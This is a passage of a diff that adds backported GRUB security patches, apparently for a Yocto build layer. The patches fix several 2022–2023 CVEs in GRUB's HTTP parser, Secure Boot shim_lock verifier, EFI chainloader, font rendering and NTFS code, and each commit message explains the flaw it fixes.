+not advance the pointer. This extra advance causes the length to be
+one greater, which breaks an assumption in parse_line(), leading to
+it writing a NUL byte one byte past the end of the buffer where we
+reconstruct the line from the two packets.
+
+It's conceivable that an attacker controlled set of packets could
+cause this to zero out the first byte of the "next" pointer of the
+grub_mm_region structure following the current_line buffer.
+
+Do not advance the pointer in the split header case.
+
+Fixes: CVE-2022-28734
+---
+ grub-core/net/http.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/net/http.c b/grub-core/net/http.c
+index 5aa4ad3..a220d21 100644
+--- a/grub-core/net/http.c
++++ b/grub-core/net/http.c
+@@ -68,7 +68,15 @@ parse_line (grub_file_t file, http_data_t data, char *ptr, grub_size_t len)
+ char *end = ptr + len;
+ while (end > ptr && *(end - 1) == '\r')
+ end--;
++
++ /* LF without CR. */
++ if (end == ptr + len)
++ {
++ data->errmsg = grub_strdup (_("invalid HTTP header - LF without CR"));
++ return GRUB_ERR_NONE;
++ }
+ *end = 0;
++
+ /* Trailing CRLF. */
+ if (data->in_chunk_len == 1)
+ {
+@@ -190,9 +198,7 @@ http_receive (grub_net_tcp_socket_t sock __attribute__ ((unused)),
+ int have_line = 1;
+ char *t;
+ ptr = grub_memchr (nb->data, '\n', nb->tail - nb->data);
+- if (ptr)
+- ptr++;
+- else
++ if (ptr == NULL)
+ {
+ have_line = 0;
+ ptr = (char *) nb->tail;
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28735.patch b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
new file mode 100644
index 0000000000..89b653a8da
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
@@ -0,0 +1,271 @@
+From 6fe755c5c07bb386fda58306bfd19e4a1c974c53 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Thu, 2 Dec 2021 15:03:53 +0100
+Subject: kern/efi/sb: Reject non-kernel files in the shim_lock verifier
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6fe755c5c07bb386fda58306bfd19e4a1c974c53]
+CVE: CVE-2022-28735
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+We must not allow other verifiers to pass things like the GRUB modules.
+Instead of maintaining a blocklist, maintain an allowlist of things
+that we do not care about.
+
+This allowlist really should be made reusable, and shared by the
+lockdown verifier, but this is the minimal patch addressing
+security concerns where the TPM verifier was able to mark modules
+as verified (or the OpenPGP verifier for that matter), when it
+should not do so on shim-powered secure boot systems.
+
+Fixes: CVE-2022-28735
+
+Signed-off-by: Julian Andres Klode <julian.klode@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/kern/efi/sb.c | 221 ++++++++++++++++++++++++++++++++++++++++
+ include/grub/verify.h | 1 +
+ 2 files changed, 222 insertions(+)
+ create mode 100644 grub-core/kern/efi/sb.c
+
+diff --git a/grub-core/kern/efi/sb.c b/grub-core/kern/efi/sb.c
+new file mode 100644
+index 0000000..89c4bb3
+--- /dev/null
++++ b/grub-core/kern/efi/sb.c
+@@ -0,0 +1,221 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ *
++ * UEFI Secure Boot related checkings.
++ */
++
++#include <grub/efi/efi.h>
++#include <grub/efi/pe32.h>
++#include <grub/efi/sb.h>
++#include <grub/env.h>
++#include <grub/err.h>
++#include <grub/file.h>
++#include <grub/i386/linux.h>
++#include <grub/kernel.h>
++#include <grub/mm.h>
++#include <grub/types.h>
++#include <grub/verify.h>
++
++static grub_efi_guid_t shim_lock_guid = GRUB_EFI_SHIM_LOCK_GUID;
++
++/*
++ * Determine whether we're in secure boot mode.
++ *
++ * Please keep the logic in sync with the Linux kernel,
++ * drivers/firmware/efi/libstub/secureboot.c:efi_get_secureboot().
++ */
++grub_uint8_t
++grub_efi_get_secureboot (void)
++{
++ static grub_efi_guid_t efi_variable_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_efi_status_t status;
++ grub_efi_uint32_t attr = 0;
++ grub_size_t size = 0;
++ grub_uint8_t *secboot = NULL;
++ grub_uint8_t *setupmode = NULL;
++ grub_uint8_t *moksbstate = NULL;
++ grub_uint8_t secureboot = GRUB_EFI_SECUREBOOT_MODE_UNKNOWN;
++ const char *secureboot_str = "UNKNOWN";
++
++ status = grub_efi_get_variable ("SecureBoot", &efi_variable_guid,
++ &size, (void **) &secboot);
++
++ if (status == GRUB_EFI_NOT_FOUND)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ status = grub_efi_get_variable ("SetupMode", &efi_variable_guid,
++ &size, (void **) &setupmode);
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ if ((*secboot == 0) || (*setupmode == 1))
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ /*
++ * See if a user has put the shim into insecure mode. If so, and if the
++ * variable doesn't have the runtime attribute set, we might as well
++ * honor that.
++ */
++ status = grub_efi_get_variable_with_attributes ("MokSBState", &shim_lock_guid,
++ &size, (void **) &moksbstate, &attr);
++
++ /* If it fails, we don't care why. Default to secure. */
++ if (status != GRUB_EFI_SUCCESS)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++ goto out;
++ }
++
++ if (!(attr & GRUB_EFI_VARIABLE_RUNTIME_ACCESS) && *moksbstate == 1)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++
++ out:
++ grub_free (moksbstate);
++ grub_free (setupmode);
++ grub_free (secboot);
++
++ if (secureboot == GRUB_EFI_SECUREBOOT_MODE_DISABLED)
++ secureboot_str = "Disabled";
++ else if (secureboot == GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ secureboot_str = "Enabled";
++
++ grub_dprintf ("efi", "UEFI Secure Boot state: %s\n", secureboot_str);
++
++ return secureboot;
++}
++
++static grub_err_t
++shim_lock_verifier_init (grub_file_t io __attribute__ ((unused)),
++ enum grub_file_type type,
++ void **context __attribute__ ((unused)),
++ enum grub_verify_flags *flags)
++{
++ *flags = GRUB_VERIFY_FLAGS_NONE;
++
++ switch (type & GRUB_FILE_TYPE_MASK)
++ {
++ /* Files we check. */
++ case GRUB_FILE_TYPE_LINUX_KERNEL:
++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++ case GRUB_FILE_TYPE_BSD_KERNEL:
++ case GRUB_FILE_TYPE_XNU_KERNEL:
++ case GRUB_FILE_TYPE_PLAN9_KERNEL:
++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++ *flags = GRUB_VERIFY_FLAGS_SINGLE_CHUNK;
++ return GRUB_ERR_NONE;
++
++ /* Files that do not affect secureboot state. */
++ case GRUB_FILE_TYPE_NONE:
++ case GRUB_FILE_TYPE_LOOPBACK:
++ case GRUB_FILE_TYPE_LINUX_INITRD:
++ case GRUB_FILE_TYPE_OPENBSD_RAMDISK:
++ case GRUB_FILE_TYPE_XNU_RAMDISK:
++ case GRUB_FILE_TYPE_SIGNATURE:
++ case GRUB_FILE_TYPE_PUBLIC_KEY:
++ case GRUB_FILE_TYPE_PUBLIC_KEY_TRUST:
++ case GRUB_FILE_TYPE_PRINT_BLOCKLIST:
++ case GRUB_FILE_TYPE_TESTLOAD:
++ case GRUB_FILE_TYPE_GET_SIZE:
++ case GRUB_FILE_TYPE_FONT:
++ case GRUB_FILE_TYPE_ZFS_ENCRYPTION_KEY:
++ case GRUB_FILE_TYPE_CAT:
++ case GRUB_FILE_TYPE_HEXCAT:
++ case GRUB_FILE_TYPE_CMP:
++ case GRUB_FILE_TYPE_HASHLIST:
++ case GRUB_FILE_TYPE_TO_HASH:
++ case GRUB_FILE_TYPE_KEYBOARD_LAYOUT:
++ case GRUB_FILE_TYPE_PIXMAP:
++ case GRUB_FILE_TYPE_GRUB_MODULE_LIST:
++ case GRUB_FILE_TYPE_CONFIG:
++ case GRUB_FILE_TYPE_THEME:
++ case GRUB_FILE_TYPE_GETTEXT_CATALOG:
++ case GRUB_FILE_TYPE_FS_SEARCH:
++ case GRUB_FILE_TYPE_LOADENV:
++ case GRUB_FILE_TYPE_SAVEENV:
++ case GRUB_FILE_TYPE_VERIFY_SIGNATURE:
++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++ return GRUB_ERR_NONE;
++
++ /* Other files. */
++ default:
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("prohibited by secure boot policy"));
++ }
++}
++
++static grub_err_t
++shim_lock_verifier_write (void *context __attribute__ ((unused)), void *buf, grub_size_t size)
++{
++ grub_efi_shim_lock_protocol_t *sl = grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ if (!sl)
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("shim_lock protocol not found"));
++
++ if (sl->verify (buf, size) != GRUB_EFI_SUCCESS)
++ return grub_error (GRUB_ERR_BAD_SIGNATURE, N_("bad shim signature"));
++
++ return GRUB_ERR_NONE;
++}
++
++struct grub_file_verifier shim_lock_verifier =
++ {
++ .name = "shim_lock_verifier",
++ .init = shim_lock_verifier_init,
++ .write = shim_lock_verifier_write
++ };
++
++void
++grub_shim_lock_verifier_setup (void)
++{
++ struct grub_module_header *header;
++ grub_efi_shim_lock_protocol_t *sl =
++ grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ /* shim_lock is missing, check if GRUB image is built with --disable-shim-lock. */
++ if (!sl)
++ {
++ FOR_MODULES (header)
++ {
++ if (header->type == OBJ_TYPE_DISABLE_SHIM_LOCK)
++ return;
++ }
++ }
++
++ /* Secure Boot is off. Do not load shim_lock. */
++ if (grub_efi_get_secureboot () != GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ return;
++
++ /* Enforce shim_lock_verifier. */
++ grub_verifier_register (&shim_lock_verifier);
++
++ grub_env_set ("shim_lock", "y");
++ grub_env_export ("shim_lock");
++}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index cd129c3..672ae16 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -24,6 +24,7 @@
+
+ enum grub_verify_flags
+ {
++ GRUB_VERIFY_FLAGS_NONE = 0,
+ GRUB_VERIFY_FLAGS_SKIP_VERIFICATION = 1,
+ GRUB_VERIFY_FLAGS_SINGLE_CHUNK = 2,
+ /* Defer verification to another authority. */
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28736.patch b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
new file mode 100644
index 0000000000..4fc9fdaf05
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
@@ -0,0 +1,275 @@
+From 431a111c60095fc973d83fe9209f26f29ce78784 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 11:17:17 +0530
+Subject: [PATCH] CVE-2022-28736
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=04c86e0bb7b58fc2f913f798cdb18934933e532d]
+CVE: CVE-2022-28736
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+loader/efi/chainloader: Use grub_loader_set_ex()
+
+This ports the EFI chainloader to use grub_loader_set_ex() in order to fix
+a use-after-free bug that occurs when grub_cmd_chainloader() is executed
+more than once before a boot attempt is performed.
+
+Fixes: CVE-2022-28736
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/commands/boot.c | 66 ++++++++++++++++++++++++++----
+ grub-core/loader/efi/chainloader.c | 46 +++++++++++----------
+ include/grub/loader.h | 5 +++
+ 3 files changed, 87 insertions(+), 30 deletions(-)
+
+diff --git a/grub-core/commands/boot.c b/grub-core/commands/boot.c
+index bbca81e..6151478 100644
+--- a/grub-core/commands/boot.c
++++ b/grub-core/commands/boot.c
+@@ -27,10 +27,20 @@
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+-static grub_err_t (*grub_loader_boot_func) (void);
+-static grub_err_t (*grub_loader_unload_func) (void);
++static grub_err_t (*grub_loader_boot_func) (void *context);
++static grub_err_t (*grub_loader_unload_func) (void *context);
++static void *grub_loader_context;
+ static int grub_loader_flags;
+
++struct grub_simple_loader_hooks
++{
++ grub_err_t (*boot) (void);
++ grub_err_t (*unload) (void);
++};
++
++/* Don't heap allocate this to avoid making grub_loader_set() fallible. */
++static struct grub_simple_loader_hooks simple_loader_hooks;
++
+ struct grub_preboot
+ {
+ grub_err_t (*preboot_func) (int);
+@@ -44,6 +54,29 @@ static int grub_loader_loaded;
+ static struct grub_preboot *preboots_head = 0,
+ *preboots_tail = 0;
+
++static grub_err_t
++grub_simple_boot_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++ return hooks->boot ();
++}
++
++static grub_err_t
++grub_simple_unload_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++ grub_err_t ret;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++
++ ret = hooks->unload ();
++ grub_memset (hooks, 0, sizeof (*hooks));
++
++ return ret;
++}
++
+ int
+ grub_loader_is_loaded (void)
+ {
+@@ -110,28 +143,45 @@ grub_loader_unregister_preboot_hook (struct grub_preboot *hnd)
+ }
+
+ void
+-grub_loader_set (grub_err_t (*boot) (void),
+- grub_err_t (*unload) (void),
+- int flags)
++grub_loader_set_ex (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = boot;
+ grub_loader_unload_func = unload;
++ grub_loader_context = context;
+ grub_loader_flags = flags;
+
+ grub_loader_loaded = 1;
+ }
+
++void
++grub_loader_set (grub_err_t (*boot) (void),
++ grub_err_t (*unload) (void),
++ int flags)
++{
++ grub_loader_set_ex (grub_simple_boot_hook,
++ grub_simple_unload_hook,
++ &simple_loader_hooks,
++ flags);
++
++ simple_loader_hooks.boot = boot;
++ simple_loader_hooks.unload = unload;
++}
++
+ void
+ grub_loader_unset(void)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = 0;
+ grub_loader_unload_func = 0;
++ grub_loader_context = 0;
+
+ grub_loader_loaded = 0;
+ }
+@@ -158,7 +208,7 @@ grub_loader_boot (void)
+ return err;
+ }
+ }
+- err = (grub_loader_boot_func) ();
++ err = (grub_loader_boot_func) (grub_loader_context);
+
+ for (cur = preboots_tail; cur; cur = cur->prev)
+ if (! err)
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index a8d7b91..93a028a 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -44,33 +44,28 @@ GRUB_MOD_LICENSE ("GPLv3+");
+
+ static grub_dl_t my_mod;
+
+-static grub_efi_physical_address_t address;
+-static grub_efi_uintn_t pages;
+-static grub_efi_device_path_t *file_path;
+-static grub_efi_handle_t image_handle;
+-static grub_efi_char16_t *cmdline;
+-
+ static grub_err_t
+-grub_chainloader_unload (void)
++grub_chainloader_unload (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
++ grub_efi_loaded_image_t *loaded_image;
+ grub_efi_boot_services_t *b;
+
++ loaded_image = grub_efi_get_loaded_image (image_handle);
++ if (loaded_image != NULL)
++ grub_free (loaded_image->load_options);
++
+ b = grub_efi_system_table->boot_services;
+ efi_call_1 (b->unload_image, image_handle);
+- efi_call_2 (b->free_pages, address, pages);
+-
+- grub_free (file_path);
+- grub_free (cmdline);
+- cmdline = 0;
+- file_path = 0;
+
+ grub_dl_unref (my_mod);
+ return GRUB_ERR_NONE;
+ }
+
+ static grub_err_t
+-grub_chainloader_boot (void)
++grub_chainloader_boot (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
+ grub_efi_boot_services_t *b;
+ grub_efi_status_t status;
+ grub_efi_uintn_t exit_data_size;
+@@ -139,7 +134,7 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+ char *dir_start;
+ char *dir_end;
+ grub_size_t size;
+- grub_efi_device_path_t *d;
++ grub_efi_device_path_t *d, *file_path;
+
+ dir_start = grub_strchr (filename, ')');
+ if (! dir_start)
+@@ -215,11 +210,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_efi_status_t status;
+ grub_efi_boot_services_t *b;
+ grub_device_t dev = 0;
+- grub_efi_device_path_t *dp = 0;
++ grub_efi_device_path_t *dp = NULL, *file_path = NULL;
+ grub_efi_loaded_image_t *loaded_image;
+ char *filename;
+ void *boot_image = 0;
+ grub_efi_handle_t dev_handle = 0;
++ grub_efi_physical_address_t address = 0;
++ grub_efi_uintn_t pages = 0;
++ grub_efi_char16_t *cmdline = NULL;
++ grub_efi_handle_t image_handle = NULL;
+
+ if (argc == 0)
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("filename expected"));
+@@ -227,11 +226,6 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+
+ grub_dl_ref (my_mod);
+
+- /* Initialize some global variables. */
+- address = 0;
+- image_handle = 0;
+- file_path = 0;
+-
+ b = grub_efi_system_table->boot_services;
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE);
+@@ -401,7 +395,11 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_file_close (file);
+ grub_device_close (dev);
+
+- grub_loader_set (grub_chainloader_boot, grub_chainloader_unload, 0);
++ /* We're finished with the source image buffer and file path now. */
++ efi_call_2 (b->free_pages, address, pages);
++ grub_free (file_path);
++
++ grub_loader_set_ex (grub_chainloader_boot, grub_chainloader_unload, image_handle, 0);
+ return 0;
+
+ fail:
+@@ -412,11 +410,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ if (file)
+ grub_file_close (file);
+
++ grub_free (cmdline);
+ grub_free (file_path);
+
+ if (address)
+ efi_call_2 (b->free_pages, address, pages);
+
++ if (image_handle != NULL)
++ efi_call_1 (b->unload_image, image_handle);
++
+ grub_dl_unref (my_mod);
+
+ return grub_errno;
+diff --git a/include/grub/loader.h b/include/grub/loader.h
+index 7f82a49..3071a50 100644
+--- a/include/grub/loader.h
++++ b/include/grub/loader.h
+@@ -39,6 +39,11 @@ void EXPORT_FUNC (grub_loader_set) (grub_err_t (*boot) (void),
+ grub_err_t (*unload) (void),
+ int flags);
+
++void EXPORT_FUNC (grub_loader_set_ex) (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags);
++
+ /* Unset current loader, if any. */
+ void EXPORT_FUNC (grub_loader_unset) (void);
+
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-3775.patch b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
new file mode 100644
index 0000000000..e2e3f35584
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
@@ -0,0 +1,97 @@
+From fdbe7209152ad6f09a1166f64f162017f2145ba3 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Mon, 24 Oct 2022 08:05:35 +0800
+Subject: [PATCH] font: Fix an integer underflow in blit_comb()
+
+The expression (ctx.bounds.height - combining_glyphs[i]->height) / 2 may
+evaluate to a very big invalid value even if both ctx.bounds.height and
+combining_glyphs[i]->height are small integers. For example, if
+ctx.bounds.height is 10 and combining_glyphs[i]->height is 12, this
+expression evaluates to 2147483647 (expected -1). This is because
+coordinates are allowed to be negative but ctx.bounds.height is an
+unsigned int. So, the subtraction operates on unsigned ints and
+underflows to a very big value. The division makes things even worse.
+The quotient is still an invalid value even if converted back to int.
+
+This patch fixes the problem by casting ctx.bounds.height to int. As
+a result the subtraction will operate on int and grub_uint16_t which
+will be promoted to an int. So, the underflow will no longer happen. Other
+uses of ctx.bounds.height (and ctx.bounds.width) are also casted to int,
+to ensure coordinates are always calculated on signed integers.
+
+Fixes: CVE-2022-3775
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=992c06191babc1e109caf40d6a07ec6fdef427af]
+CVE: CVE-2022-3775
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 16 ++++++++--------
+ 1 file changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index f110db9..3b76b22 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1200,12 +1200,12 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ ctx.bounds.height = main_glyph->height;
+
+ above_rightx = main_glyph->offset_x + main_glyph->width;
+- above_righty = ctx.bounds.y + ctx.bounds.height;
++ above_righty = ctx.bounds.y + (int) ctx.bounds.height;
+
+ above_leftx = main_glyph->offset_x;
+- above_lefty = ctx.bounds.y + ctx.bounds.height;
++ above_lefty = ctx.bounds.y + (int) ctx.bounds.height;
+
+- below_rightx = ctx.bounds.x + ctx.bounds.width;
++ below_rightx = ctx.bounds.x + (int) ctx.bounds.width;
+ below_righty = ctx.bounds.y;
+
+ comb = grub_unicode_get_comb (glyph_id);
+@@ -1218,7 +1218,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ if (!combining_glyphs[i])
+ continue;
+- targetx = (ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
++ targetx = ((int) ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
+ /* CGJ is to avoid diacritics reordering. */
+ if (comb[i].code
+ == GRUB_UNICODE_COMBINING_GRAPHEME_JOINER)
+@@ -1228,8 +1228,8 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ case GRUB_UNICODE_COMB_OVERLAY:
+ do_blit (combining_glyphs[i],
+ targetx,
+- (ctx.bounds.height - combining_glyphs[i]->height) / 2
+- - (ctx.bounds.height + ctx.bounds.y), &ctx);
++ ((int) ctx.bounds.height - combining_glyphs[i]->height) / 2
++ - ((int) ctx.bounds.height + ctx.bounds.y), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+ break;
+@@ -1302,7 +1302,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ /* Fallthrough. */
+ case GRUB_UNICODE_STACK_ATTACHED_ABOVE:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height + ctx.bounds.y + space
++ -((int) ctx.bounds.height + ctx.bounds.y + space
+ + combining_glyphs[i]->height), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+@@ -1310,7 +1310,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ case GRUB_UNICODE_COMB_HEBREW_DAGESH:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height / 2 + ctx.bounds.y
++ -((int) ctx.bounds.height / 2 + ctx.bounds.y
+ + combining_glyphs[i]->height / 2), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4692.patch b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
new file mode 100644
index 0000000000..0e74870ebf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
@@ -0,0 +1,97 @@
+From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:31:57 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST
+ attribute for the $MFT file
+
+When parsing an extremely fragmented $MFT file, i.e., the file described
+using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer
+containing bytes read from the underlying drive to store sector numbers,
+which are consumed later to read data from these sectors into another buffer.
+
+These sectors numbers, two 32-bit integers, are always stored at predefined
+offsets, 0x10 and 0x14, relative to first byte of the selected entry within
+the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem.
+
+However, when parsing a specially-crafted file system image, this may cause
+the NTFS code to write these integers beyond the buffer boundary, likely
+causing the GRUB memory allocator to misbehave or fail. These integers contain
+values which are controlled by on-disk structures of the NTFS file system.
+
+Such modification and resulting misbehavior may touch a memory range not
+assigned to the GRUB and owned by firmware or another EFI application/driver.
+
+This fix introduces checks to ensure that these sector numbers are never
+written beyond the boundary.
+
+Fixes: CVE-2023-4692
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea]
+CVE: CVE-2023-4692
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 18 +++++++++++++++++-
+ 1 file changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index 2f34f76..c8d3683 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ if (at->attr_end)
+ {
+- grub_uint8_t *pa;
++ grub_uint8_t *pa, *pa_end;
+
+ at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ if (at->emft_buf == NULL)
+@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ at->attr_nxt = at->edat_buf;
+ at->attr_end = at->edat_buf + u32at (pa, 0x30);
++ pa_end = at->edat_buf + n;
+ }
+ else
+ {
+ at->attr_nxt = at->attr_end + u16at (pa, 0x14);
+ at->attr_end = at->attr_end + u32at (pa, 4);
++ pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ }
+ at->flags |= GRUB_NTFS_AF_ALST;
+ while (at->attr_nxt < at->attr_end)
+@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ at->flags |= GRUB_NTFS_AF_GPOS;
+ at->attr_cur = at->attr_nxt;
+ pa = at->attr_cur;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ grub_set_unaligned32 ((char *) pa + 0x10,
+ grub_cpu_to_le32 (at->mft->data->mft_start));
+ grub_set_unaligned32 ((char *) pa + 0x14,
+@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ {
+ if (*pa != attr)
+ break;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ if (read_attr
+ (at, pa + 0x10,
+ u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR),
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4693.patch b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
new file mode 100644
index 0000000000..1e6b6efdec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
@@ -0,0 +1,62 @@
+From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:32:33 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident
+ $DATA attribute
+
+When reading a file containing resident data, i.e., the file data is stored in
+the $DATA attribute within the NTFS file record, not in external clusters,
+there are no checks that this resident data actually fits the corresponding
+file record segment.
+
+When parsing a specially-crafted file system image, the current NTFS code will
+read the file data from an arbitrary, attacker-chosen memory offset and of
+arbitrary, attacker-chosen length.
+
+This allows an attacker to display arbitrary chunks of memory, which could
+contain sensitive information like password hashes or even plain-text,
